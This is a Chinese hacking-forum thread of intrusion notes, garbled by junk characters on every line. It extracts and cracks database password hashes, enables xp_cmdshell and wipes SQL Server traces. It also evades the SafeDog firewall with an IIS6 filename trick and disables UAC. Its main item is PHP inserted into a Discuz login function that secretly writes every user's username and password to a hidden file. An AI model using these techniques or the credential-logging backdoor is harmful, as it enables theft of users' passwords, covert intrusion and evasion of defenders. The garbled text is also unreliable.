C" O1 m: {) V在它下面直接插入即可,记录的密码生成在pwd.txt中," }% `* D/ f) C9 k! o
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录! T! `, E4 h7 [7 z/ i
利用II6文件解析漏洞绕过安全狗代码:( R0 @) Q; j. ~7 u
;antian365.asp;antian365.jpg2 V7 _1 @/ |) I/ l3 y
% Y& C4 i4 p4 k- ^/ C* k
各种类型数据库抓HASH破解最高权限密码! \: H- H# l' o9 ~5 h
1.sql server2000
4 {# f- V% i0 [. `8 n# zSELECT password from master.dbo.sysxlogins where name='sa'
6 ? {2 |8 G1 Q$ i/ |; d5 x2 ~0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
1 N. g) l2 D- O5 F2FD54D6119FFF04129A1D72E7C3194F7284A7F3A; Z( y. v7 |: v6 I/ W" \1 c
# _0 ~& z6 L+ n8 M! X# r
0×0100- constant header) k) t* Z; `- p- `% E
34767D5C- salt0 `' l" U, ?8 Z5 M
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash7 P n9 A: @( B/ w+ e" L
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
: ?, @" V+ j* ?0 J1 H j2 {crack the upper case hash in ‘cain and abel’ and then work the case sentive hash w& N6 R% d" C1 G5 N5 H: p
SQL server 2005:-
. \ l8 B" |; p4 P. I& dSELECT password_hash FROM sys.sql_logins where name='sa'
1 N' T* L* W+ m2 C5 a( m8 u# s0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F( W1 P/ i1 q' t' l. ^
0×0100- constant header; }5 A |9 \( e5 c
993BF231-salt
; x3 t7 \( L6 I3 }5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
7 [! ] L# \) xcrack case sensitive hash in cain, try brute force and dictionary based attacks.9 a7 s% s* F6 N- Q
4 ^& C8 a- Q4 ^8 ~
update:- following bernardo’s comments:-
- `# b$ i. ], ?' Cuse function fn_varbintohexstr() to cast password in a hex string.9 x7 R1 [( ~$ J( V: m4 l
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins! T# C* T; n8 \8 ^& V3 B1 G8 p
5 `6 U" P- i6 g
MYSQL:-
M% e% V# L4 c) A) o( y2 H5 D$ t) U1 d7 u: p+ L* {$ W
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
% @2 z7 c. L" K- A7 i
1 H8 _( ]4 _' o$ U1 ]8 |*mysql < 4.13 i3 z& T- B/ K% l _
% P T2 I ~ Pmysql> SELECT PASSWORD(‘mypass’);
, n; ^0 v( F. H$ T! x( n8 J8 S+——————–+
- r- m& f2 S$ |9 ^2 B$ K9 z3 H| PASSWORD(‘mypass’) |
! e, e: c1 d( L* h7 Z0 N+——————–+" m! m6 G7 J J7 i- a
| 6f8c114b58f2ce9e |
; m9 }1 x4 X9 O% e+——————–+3 B! ^$ U3 V, z; X- j4 p* U
* M# i7 p3 q2 m' P*mysql >=4.16 `! K0 V9 T5 F- }+ ^' K8 k6 X( D
- A5 u0 y8 k1 z) ~1 o0 a: P
mysql> SELECT PASSWORD(‘mypass’);
" P9 k- t4 m6 p# ?+——————————————-+
# }" g1 b) ]- f3 j: d z# E' _# n6 e| PASSWORD(‘mypass’) |; _$ a9 Y& |( Y F
+——————————————-+2 ?0 g" L: f8 t, ?. `4 E
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
3 |9 _+ z. S, M h" y3 M+——————————————-+
* L3 n( V0 C3 f2 P5 l( Y; f1 l8 V7 ~
Select user, password from mysql.user; ^. u2 h$ M X6 N4 w
The hashes can be cracked in ‘cain and abel’- I' b8 C3 |& i2 F# y* L1 I6 S
# @+ d# n8 K ]# I6 e* dPostgres:-
. `" d5 g3 y4 F* \" \Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
- A6 g5 Z `9 \8 B% Aselect usename, passwd from pg_shadow;' `' f2 x; e. v, V. X6 K: P
usename | passwd ]" l0 K S& X- T3 x. C
——————+————————————-. s" I( W- a4 E2 Y9 Q6 h
testuser | md5fabb6d7172aadfda4753bf0507ed4396
( p' t* `8 i( b! P+ nuse mdcrack to crack these hashes:-6 E% t& U* L4 A" K: I/ _
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396, H- L: @, G; V; W1 W3 }! ]
2 d! m) {" X! p5 s
Oracle:-
2 ?! A8 |5 Z& m Tselect name, password, spare4 from sys.user$5 D; `9 Y. f7 `, @
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
$ D, o/ g+ C% p7 e' j7 Y% hMore on Oracle later, i am a bit bored….6 K% q f# v) X
9 @* k8 ?: D6 T6 o
$ O+ e0 O, t, |% ~在sql server2005/2008中开启xp_cmdshell4 C3 S' V7 M0 M3 {) x/ n9 `& ?0 c
-- To allow advanced options to be changed.
2 L! p7 q* F1 a7 P6 {; [6 yEXEC sp_configure 'show advanced options', 1; T/ Q8 M) z$ |
GO2 F% v5 ?9 w, Z' T
-- To update the currently configured value for advanced options.
% l M$ Q- _+ Z6 K, cRECONFIGURE
5 d y- B" F3 |8 S" dGO
E( s6 R3 B9 @/ e- F9 ^-- To enable the feature.
2 Y- I$ u4 g8 _EXEC sp_configure 'xp_cmdshell', 1
! u* q& \& w* Q& c' @7 xGO( U/ i& R; Q5 X: Z6 U+ H
-- To update the currently configured value for this feature.. H2 I3 T C3 h% Y. l" M8 K$ b" ^
RECONFIGURE
: f4 u! e/ Z, Z. T9 L. ]GO( _5 Q' |0 L" N% i. q ?' ?3 n
SQL 2008 server日志清除,在清楚前一定要备份。
8 K K3 ^6 Q5 ]6 R如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
- _( j {' x4 E& X1 B& EX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
7 @0 B) |- C8 S% k2 m) c% m
2 x6 Z* z4 ]& ^3 J: S3 L对于SQL Server 2008以前的版本:
( r( F0 J" ]# ]8 ~2 J# _. a; BSQL Server 2005:
: f* p# F1 N9 u+ C, R删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat5 z, d7 o) L& T+ S% p
SQL Server 2000:
- e; G* i5 Y7 e8 N! B清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
# R* N0 J0 H) d$ y- Q" R- n
2 i9 `4 x Q6 }0 j本帖最后由 simeon 于 2013-1-3 09:51 编辑
, D, Y0 |2 L+ u3 w \- X
7 ^. g, K% Q- O
9 o8 k3 y1 f' P7 R5 |. _- Ewindows 2008 文件权限修改
$ W% ~5 E# L6 f1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx+ j+ \+ F* ~" N! a6 F
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad984 U' l, E, m1 `! I3 z( z
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
; J# v, l; p4 D ^" y
{( n* i4 l K0 Z/ _' Q6 CWindows Registry Editor Version 5.00; I4 Y8 ^2 M, `
[HKEY_CLASSES_ROOT\*\shell\runas]
6 `4 j9 Z& a+ n& p$ q( m: e@="管理员取得所有权"
) @, F8 T0 r+ c. l- ~. g0 R"NoWorkingDirectory"="". |# n) }" {% S. z8 z
[HKEY_CLASSES_ROOT\*\shell\runas\command]
" S/ q% y8 t1 f+ L2 F C3 B0 Y h@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
" F2 T% A6 ^% M* F* i1 f"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
$ q; i' Z8 X j- L; X* O: I! d[HKEY_CLASSES_ROOT\exefile\shell\runas2]/ n9 z% x a/ s, c6 M
@="管理员取得所有权"
* T+ c8 o& S" q( ?. V"NoWorkingDirectory"=""
; Q# s# {* ?: ]9 x5 y8 ]" k[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
$ I2 i' r0 g+ T( t1 \$ Q4 g@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
) a K$ i, |, s) n$ u" z"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"% V$ u2 M, c+ W% A9 w1 d
& ?' j5 i! u5 K3 f& T4 I: e[HKEY_CLASSES_ROOT\Directory\shell\runas]
* k5 ?# u% S' R$ I5 R; v! J@="管理员取得所有权"
2 u4 Q3 u/ a6 S; u"NoWorkingDirectory"=""# \3 [# X1 F- I1 L& A) P. b$ u
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
5 o* B% q O/ c, K) P3 t' [5 ^@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
9 V# C3 ]0 }. t! v2 x"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t", h7 c M) X1 f, J {
- a4 L, w% h: l7 ~9 c
/ t) [: _! E4 Y/ N; y
win7右键“管理员取得所有权”.reg导入
" I/ G u @7 x8 \8 I/ j, x7 V: }二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”," i. Y$ @- u* H$ L
1、C:\Windows这个路径的“notepad.exe”不需要替换
* X9 x2 T, ~0 |9 S5 @' C" J! z! w2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
/ H' m- u0 a( |% s. t4 w4 ?3、四个“notepad.exe.mui”不要管( E, \- D5 p- J9 v9 H9 G( u! n4 t
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
. ~! S' z% y' p* \& eC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”7 {+ r9 g! f0 s1 X
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,& T; f* |' g" O
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
$ o3 Y, b6 E/ C& b" twindows 2008中关闭安全策略:
, `5 b X2 k: }1 ]1 t# ^reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
. t. H. q( V( k& Z3 U. L* {( O修改uc_client目录下的client.php 在
2 `# f' ~* M1 ufunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
- D( f: w4 J/ M5 @# r3 k下加入如上代码,在网站./data/cache/目录下自动生成csslog.php. ^' g% A" }7 j' `# Y1 z
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw* ?( X: }9 ?7 M* X, X( i% _8 E
if(getenv('HTTP_CLIENT_IP')) {) N& {* S! Z$ Z7 G& K' N2 C7 c# T
$onlineip = getenv('HTTP_CLIENT_IP');, N; N8 i/ _5 i5 o5 w9 S& n
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {5 c' T! O8 ?" a( s8 y! q) ?
$onlineip = getenv('HTTP_X_FORWARDED_FOR');" x& c: M8 R' Q
} elseif(getenv('REMOTE_ADDR')) {7 {0 F" }( \. A- m6 }/ E
$onlineip = getenv('REMOTE_ADDR');
& z. o' _0 M7 H0 _} else {% |" `/ Q$ ^0 V6 M4 ^" H
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
3 y$ ^$ G* t! Z+ F4 @6 b}
# x6 k! K( e/ q $showtime=date("Y-m-d H:i:s");
+ b$ @6 M' `1 \, X9 J$ Y k $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
5 `! \. H5 `3 o, F6 x7 P4 D0 { $handle=fopen('./data/cache/csslog.php','a+');
; T7 v& ~$ y% `' i, ?& p+ S $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对